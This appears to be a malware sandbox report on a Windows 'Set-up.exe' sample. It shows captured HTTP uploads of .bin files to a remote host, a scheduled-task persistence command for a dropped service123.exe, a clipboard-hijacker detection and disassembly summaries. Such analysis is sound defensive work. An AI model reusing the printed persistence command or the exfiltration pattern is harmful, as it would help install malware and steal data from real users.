0	192.168.2.6	49747	185.244.181.140	80	6244	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:44:43.281541109 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary46584377 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: fiftvx15pt.top
Oct 4, 2024 14:44:43.281637907 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 36 35 38 34 33 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 75 78 Data Ascii: ------Boundary46584377Content-Disposition: form-data; name="file"; filename="Nuxozuno.bin"Content-Type: application/octet-streamQnpEDd}yVX_hRV?kF-^/%$2BXs^<Q
Oct 4, 2024 14:44:43.996881962 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:44:43 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49775	185.244.181.140	80	6244	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:44:47.511284113 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary38382003 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 91197 Host: fiftvx15pt.top
Oct 4, 2024 14:44:47.511374950 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 38 33 38 32 30 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 65 7a Data Ascii: ------Boundary38382003Content-Disposition: form-data; name="file"; filename="Wezenexut.bin"Content-Type: application/octet-stream:9DcvN&R\#^F[Ij:1Kx*g3j@S\%\|D[X\UJRHPNzSc2
Oct 4, 2024 14:44:47.516182899 CEST	1236	OUT	Data Raw: d3 99 12 73 63 c5 aa 53 8f 8c ef 78 60 58 15 37 06 ac cf 13 e6 23 25 e2 19 f9 81 93 21 e0 be 82 fa 16 7e da a4 45 51 af b7 6d ed 98 97 b7 8f fe ab 3a e4 ce 81 49 d1 e4 12 1b 5c c8 86 bb 44 d7 6a 84 87 59 94 3c 67 85 41 ae d0 40 ec 8c b9 b3 2f de Data Ascii: scSx`X7#%!~EQm:I\DjY<gA@/GdWg*VRp!"xzL>)E7Dr>J`;FHa8=`.l\|aQSX\|\>aRPe4)B;TJdgDI'\h#BK3zQN]q
Oct 4, 2024 14:44:47.516307116 CEST	2472	OUT	Data Raw: 24 94 5c 31 e8 d1 73 12 0a 56 7f 09 e2 7b d0 e9 f9 8f 8d 44 ac 42 dd e7 d4 15 d8 1f aa 1a 9a aa 1d 09 b9 80 79 89 05 4e 23 87 7c 58 28 45 02 c8 c3 64 62 4b 55 3c f4 3d bb fe 96 22 71 87 d1 35 9c 0e aa 83 c9 f3 c4 e0 d9 66 5b f3 35 49 cb 03 50 7f Data Ascii: $\1sV{DByN#\|X(EdbKU<="q5f[5IPK,J,o/VmHlNwGM+4J,4 {wQ\|zD)paNBGW8vG_w]Y~pXg4c7
Oct 4, 2024 14:44:47.516356945 CEST	4944	OUT	Data Raw: ff b6 5e 36 f2 4c 15 86 a8 c6 7d 1d 27 49 7b 49 be 67 c7 76 1e 6c 5c 82 30 c5 7d c9 2a 2e 2a 1f 39 54 f9 c7 60 1c 41 67 ce 51 77 8c 6a 18 70 14 19 af d0 17 f9 91 e0 93 7b 71 8b e7 c4 91 20 ba 7c 1d 6d c2 5b f1 23 a1 69 e8 c9 78 0e 79 66 50 dc 95 Data Ascii: ^6L}'I{Igvl\0}.9T`AgQwjp{q \|m[#ixyfPDZZv!Yc\XCyY9eI ;\\|B%42?Azg _JCq.MlmR[`*2!TdXg#Sa'1R5iM{TL6Y-1s28tWa
Oct 4, 2024 14:44:47.516483068 CEST	2472	OUT	Data Raw: b2 2f 86 e3 1d d9 e4 61 70 f1 5a 26 c4 82 bc cf 09 f8 2e ef 47 27 75 bc e9 db b0 75 97 2f 21 ee ac a6 90 31 db c7 5d 54 4a da e7 b6 1a 8f 8e 34 8d 17 42 51 4f 3f 86 29 3f 54 57 27 e4 f9 a3 d2 7f 7b 39 1c c6 e7 a3 f1 1d b7 3c cd 6b 70 20 81 a9 15 Data Ascii: /apZ&.G'uu/!1]TJ4BQO?)?TW'{9<kp 48}spRWta&>O<o73JmF}8!aen{x}h~tN/wfa60,h/(),,$!gy1-Tw{C@:A^K8[
Oct 4, 2024 14:44:47.516520977 CEST	4944	OUT	Data Raw: 56 9e e2 39 c1 95 a5 7d bd 60 b6 ef 87 c4 86 e1 13 1c 20 0e f9 64 c5 c2 76 d4 84 b3 da ff 5a 52 db 20 39 a9 be b2 20 bb 44 f4 43 97 68 43 d6 ff e8 0f 49 f8 85 1c 0c 88 ba ea 6f 02 be a0 9f 64 70 89 85 e0 dd 81 c2 ea 26 f5 b9 f9 0a 66 39 88 72 d5 Data Ascii: V9}` dvZR 9 DChCIodp&f9rB4k/@7o#l1_GzI:rP\W#2yc4{r} Kwj;jO>sd^puCy{-Nqd(C`tqL/iK"+
Oct 4, 2024 14:44:47.516561031 CEST	6180	OUT	Data Raw: e1 13 4e fd 1b bd f9 20 0c 23 1e 07 64 0f 4d eb 5b 58 2b 14 e0 fb b9 d3 10 34 df 52 1b f2 89 49 d2 30 b3 90 5d 4d a8 db d1 c0 d7 cc 37 44 58 27 ce 48 ce 08 43 a8 14 61 37 01 97 04 b0 03 83 ee 05 b1 2c e3 0a 26 0f 87 e9 d1 d2 97 45 10 aa 83 4c fb Data Ascii: N #dM[X+4RI0]M7DX'HCa7,&EL=g#;{-` UK.Vpw?llSnRUD*;:r[:cK0_fcM;Cs4FxJvQ:)B50"Znc
Oct 4, 2024 14:44:47.521186113 CEST	1236	OUT	Data Raw: 65 7c 54 5d 4c 5e f2 d0 92 f1 7c dd 47 bd e7 ab a7 82 89 f3 24 ad 97 41 1c 81 ea 6c d1 16 8b 49 52 ee 94 3b 71 dc e8 75 d5 2f 00 a4 60 98 aa 6f 13 ef 14 cf 11 24 6f 65 f7 77 fa 93 57 0a 68 35 f7 37 5d 60 40 0e be 61 57 4f 28 3d e3 8d 5a 31 44 28 Data Ascii: e\|T]L^\|G$AlIR;qu/`o$oewWh57]`@aWO(=Z1D(/,iz3q5Sp%l~R(%cFj4P%5~}ln]GdD}ej3i;F\|~`GC)!{KfbhLCmDHnmDKb
Oct 4, 2024 14:44:47.521258116 CEST	4944	OUT	Data Raw: 85 57 5b a9 b8 4e 40 98 3e 89 9c 99 74 b5 b0 b3 f9 38 bc 1b 0c aa bd 71 86 3f c6 5f 16 98 5a 20 8e 70 d8 bc fa c6 39 08 a9 0b 2a 18 bb f7 ee 43 37 d1 6b ee e0 9d 35 96 32 06 f9 5d e4 9f 9b 18 23 77 2a 51 6c ff ae 13 ef d6 25 bd 7d ae b5 d4 ab b6 Data Ascii: W[N@>t8q?_Z p9C7k52]#wQl%}Q* 4?,U<?5\D":SW0:nn`&iSD!9\>%S;is<Ai8x,^[C8q3})Rcv
Oct 4, 2024 14:44:47.521506071 CEST	2472	OUT	Data Raw: 6e ab 19 7f 17 3a 35 07 b0 e5 cf 13 ee b9 25 16 bb f6 50 e9 c4 54 13 3c 05 d6 35 ab ea a4 f4 38 cc 81 c4 09 78 16 9a 16 5d a6 29 72 22 c3 c6 72 15 78 84 01 89 bd f3 26 de 07 da 23 f6 10 bc c8 f2 c4 41 1a 63 43 9f fc 4a fe df f5 48 44 7c 2b 80 b9 Data Ascii: n:5%PT<58x])r"rx&#AcCJHD\|+aF>&tHR_OMZZM$}rH]-$$ET`d4X{vj!-0-?tS+?b^66MP Y)W+{9$\
Oct 4, 2024 14:44:48.449207067 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:44:48 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49802	185.244.181.140	80	6244	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:44:51.671138048 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary27285830 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30096 Host: fiftvx15pt.top
Oct 4, 2024 14:44:51.671221018 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 32 37 32 38 35 38 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 75 70 Data Ascii: ------Boundary27285830Content-Disposition: form-data; name="file"; filename="Hupurofi.bin"Content-Type: application/octet-streamDP)8;(\'F"6k?bfDN>s'49w;$qgCz?5\|D"
Oct 4, 2024 14:44:51.676115990 CEST	1236	OUT	Data Raw: bc 64 52 9f e5 60 3b 65 15 17 2b 2c 2e 89 0b 9d ea 61 1f d0 98 8c 76 40 a5 81 fc 64 38 a5 78 e6 d2 97 13 1f de e0 f9 9d 15 15 33 bc cb cf 8f ef 9c fd 4b 33 c7 40 78 d8 6a 3a 08 c0 ee 09 bb 9e cb 32 2c f1 50 86 83 2b 90 67 24 09 a1 a3 89 cf 66 96 Data Ascii: dR`;e+,.av@d8x3K3@xj:2,P+g$f=?i7?9nk\zwBB"w%}g@>]HCC@B %H!zV_<i!)-h{1Q)(9sp=Q^/qGLkE/x(
Oct 4, 2024 14:44:51.676230907 CEST	7416	OUT	Data Raw: 24 ff 2d 93 fc 83 df 43 a8 60 13 50 82 46 20 29 4d 11 5d bb a2 90 97 1e 55 b9 d4 07 17 d9 79 5a 23 c8 07 37 87 f2 33 dd 15 35 fb e1 37 28 2f 73 56 43 1a 81 01 20 81 eb c5 13 cb 93 a9 61 c0 83 30 a8 de 84 bc 5d bd a6 2e 61 1b 52 4c 7d b2 82 20 36 Data Ascii: $-C`PF )M]UyZ#7357(/sVC a0].aRL} 6)S{BN'~MIr3n2z9D\|2fh!gv+i3Zoj'KcdLd83s*+s!_xdH,)J!>
Oct 4, 2024 14:44:51.676264048 CEST	2472	OUT	Data Raw: 61 6e 62 51 db 60 c8 72 d5 ee e2 dc 38 8c db ac 6b cc 5e ce 7f 9c db f9 67 e5 d7 be 84 a2 4b 34 f8 a0 90 50 a5 5d cf 9f 68 68 db fc 11 88 16 2d 08 d5 59 76 a7 c0 9a f0 5f b4 ff 48 02 85 13 df 86 41 e4 f7 1e 74 55 4d 13 9e 71 32 79 17 31 2e b8 ef Data Ascii: anbQ`r8k^gK4P]hh-Yv_HAtUMq2y1. H90Y%p<YxHKy8xVU@})i]mLp<A&1<uEAY6TC7iR}$R7QEMdMG_(gI9pZo+M
Oct 4, 2024 14:44:51.676412106 CEST	7416	OUT	Data Raw: 98 98 e7 0a a1 07 f3 1c f1 ac 74 84 ad 6a 15 6d c4 a6 52 c6 14 39 c4 ab 9f ef 66 d7 61 84 16 6b e2 0a 0c 3e 19 ce be 66 28 96 9c cd 26 ff b6 f3 a4 2a 1e 56 cd c2 04 97 e1 ab 94 8c dd 81 77 b9 c7 ac f4 47 0a 28 b0 ba ee 0e d8 90 08 07 d4 40 2d e9 Data Ascii: tjmR9fak>f(&VwG(@-y#!bx1/;YyT-@Nl1b t<Qy9#\|.h0_;cg7I~P{FR0:keiF-U\dI8+)5ea2
Oct 4, 2024 14:44:51.676412106 CEST	432	OUT	Data Raw: 98 81 54 6d 9d 7b 82 10 ed 38 f5 b0 54 ea 6f d1 b8 79 44 8a 03 20 a6 78 a1 9f a7 c4 3e e0 c4 0a 8a 54 f1 55 f5 7a 0a 9b 35 d6 cf 45 75 cd f4 ae be d2 be 23 29 7f cc 9a d3 06 8c 3e 08 46 3a 91 dc 49 bc 08 cd 9f 14 2f a6 0a 5f 1a ea 91 8b bc e5 97 Data Ascii: Tm{8ToyD x>TUz5Eu#)>F:I/_j!0<6K/ICX\|P\S ?W7GJ4-7yR7g\|-oBPx~I^#"n<W=>6'7\|=C+#wL
Oct 4, 2024 14:44:52.481091976 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:44:52 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	08:44:32
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0xb30000
File size:	9'979'904 bytes
MD5 hash:	AA8809CE5384175BE7C0EFB2604787F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2825437842.000000000445D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:45:34
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x1e0000
File size:	314'617'856 bytes
MD5 hash:	49859361F2114985E390C5057AAADD9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	08:45:35
Start date:	04/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0xa60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:45:35
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:45:37
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x1e0000
File size:	314'617'856 bytes
MD5 hash:	49859361F2114985E390C5057AAADD9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:46:02
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x1e0000
File size:	314'617'856 bytes
MD5 hash:	49859361F2114985E390C5057AAADD9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.1%
Total number of Nodes:	72
Total number of Limit Nodes:	3

Executed Functions

Function 001E116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 001E11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001E1238
__p__acmdln.MSVCRT ref: 001E1261
malloc.MSVCRT ref: 001E12EB
strlen.MSVCRT ref: 001E1323
malloc.MSVCRT ref: 001E132E
memcpy.MSVCRT ref: 001E1344
GetStartupInfoA.KERNEL32 ref: 001E1433

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: cc1fe919948f23d0b71229a08361a61428533ad10a4f7e54ce1b7408f8287c56
Instruction ID: 9b9464c6f678f431fa4259ff2e31d50c9a07cf9be1e325eb5e7e0ce93f07f164
Opcode Fuzzy Hash: cc1fe919948f23d0b71229a08361a61428533ad10a4f7e54ce1b7408f8287c56
Instruction Fuzzy Hash: 0381AC71904BC19FDB20EFA6E8C036EB7E1FB44300F19492CEA859B751D7759989CB82

Function 001E15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 001E15CD
_exit.MSVCRT ref: 001E161A
_write.MSVCRT ref: 001E166A
_close.MSVCRT ref: 001E1679

Strings

terminated, xrefs: 001E1640
@, xrefs: 001E8341
CONOUT$, xrefs: 001E15C6

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 9710219f81b1a281b0f0730ce5f547729a7a8ecc758d8dd88283b52108f8f591
Instruction ID: de6f954a824e03e5a5303d089a6624ea34d804fc4fc94ffacecb950f366d5202
Opcode Fuzzy Hash: 9710219f81b1a281b0f0730ce5f547729a7a8ecc758d8dd88283b52108f8f591
Instruction Fuzzy Hash: 83415BB09047809FDB10EFBAD88466EBBF4BF88314F04892DE899D7250E774D845CB52

Function 6C7614B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C7614CD
_exit.MSVCRT ref: 6C76151A
_write.MSVCRT ref: 6C76156A
_close.MSVCRT ref: 6C761579

Strings

CONOUT$, xrefs: 6C7614C6
@, xrefs: 6C834AB1
terminated, xrefs: 6C761540

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 4a255b9cfc0759dc191a1914078196b02f6d16eea2ac20cb9073584b87401c1d
Instruction ID: a344898c7a7f7d4bc1a2664efe13c84d4effd680e5278bef03bc97e4a831803c
Opcode Fuzzy Hash: 4a255b9cfc0759dc191a1914078196b02f6d16eea2ac20cb9073584b87401c1d
Instruction Fuzzy Hash: E5415CB0A093059FDB10DFB9C54865EBBF4AF89318F009A2DE8A9D7A50E335D444CB96

Function 001E81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,001E138E,?,?,00006EA2,001E138E), ref: 001E8271
GetProcAddress.KERNEL32 ref: 001E828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,001E138E,?,?,00006EA2,001E138E), ref: 001E829D

Strings

Failed to get function address. Error code: %d, xrefs: 001E82E0
HwYuaUvXqdEkCixudEkCixuJard.dll, xrefs: 001E824A
gfwyxCyYobSLIrBLAjKQ, xrefs: 001E827E

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$HwYuaUvXqdEkCixudEkCixuJard.dll$gfwyxCyYobSLIrBLAjKQ
API String ID: 145871493-817358831
Opcode ID: b122fff390add5c69972ec0306352ba724298c33eecef3798b8289455a6d1e36
Instruction ID: 3d1c0c137e6bdaca51aef6b07533c1ec2059f315d3aa00877a0be21e3d68ba05
Opcode Fuzzy Hash: b122fff390add5c69972ec0306352ba724298c33eecef3798b8289455a6d1e36
Instruction Fuzzy Hash: F431E872904A819FDB00EFB5ED8949EBBF5FF49300F054928F54997200EB75D585CB92

Function 001E8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,001E138E,?,?,00006EA2,001E138E), ref: 001E8271
GetProcAddress.KERNEL32 ref: 001E828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,001E138E,?,?,00006EA2,001E138E), ref: 001E829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001E138E,?,?,00006EA2,001E138E), ref: 001E82BD
GetLastError.KERNEL32 ref: 001E82DA
FreeLibrary.KERNEL32 ref: 001E82F3

Strings

HwYuaUvXqdEkCixudEkCixuJard.dll, xrefs: 001E824A
Failed to load DLL. Error code: %d, xrefs: 001E82C3
gfwyxCyYobSLIrBLAjKQ, xrefs: 001E827E

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$HwYuaUvXqdEkCixudEkCixuJard.dll$gfwyxCyYobSLIrBLAjKQ
API String ID: 1397630947-1177338416
Opcode ID: e11bffb37ad1de678097abc28a7381c193db215fd89029c26e1b2bdba1aa76bb
Instruction ID: 92f9fcd1c57314bc25e36794a15827530ba793377626e91346a579f2c6dc55e2
Opcode Fuzzy Hash: e11bffb37ad1de678097abc28a7381c193db215fd89029c26e1b2bdba1aa76bb
Instruction Fuzzy Hash: 48110472804E819FD700AFB5DE4A58EBFE1EF45300F008928E95997144FF72E581CB82

Function 001E13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 001E1238
__p__acmdln.MSVCRT ref: 001E1261
malloc.MSVCRT ref: 001E12EB
strlen.MSVCRT ref: 001E1323
malloc.MSVCRT ref: 001E132E
memcpy.MSVCRT ref: 001E1344
_amsg_exit.MSVCRT ref: 001E13EA
_initterm.MSVCRT ref: 001E140C

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 1ad61aa7826f2ce529f9fb59d4a7d9ce1bdf7a72634d5dfea746be4db0093ba0
Instruction ID: 7be373da6156e5c5953028deb693607d1412c9bb548afa334f951fe5850df9ed
Opcode Fuzzy Hash: 1ad61aa7826f2ce529f9fb59d4a7d9ce1bdf7a72634d5dfea746be4db0093ba0
Instruction Fuzzy Hash: D14158B0A04B819FDB10EFA6E88035DBBF1BB54300F14492DE9899B751D775A986CF42

Function 001E11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 001E11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001E1238
__p__acmdln.MSVCRT ref: 001E1261
malloc.MSVCRT ref: 001E12EB
strlen.MSVCRT ref: 001E1323
malloc.MSVCRT ref: 001E132E
memcpy.MSVCRT ref: 001E1344
_amsg_exit.MSVCRT ref: 001E13EA
_initterm.MSVCRT ref: 001E140C

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: fe711879f792839cb5d4f9fd122291c4c61ee28b67adaad04fd4ee04dcf48472
Instruction ID: 778ead1531e93e2d9585fef6978f4ce5788c3a698a8102349f1c8171ca512f4d
Opcode Fuzzy Hash: fe711879f792839cb5d4f9fd122291c4c61ee28b67adaad04fd4ee04dcf48472
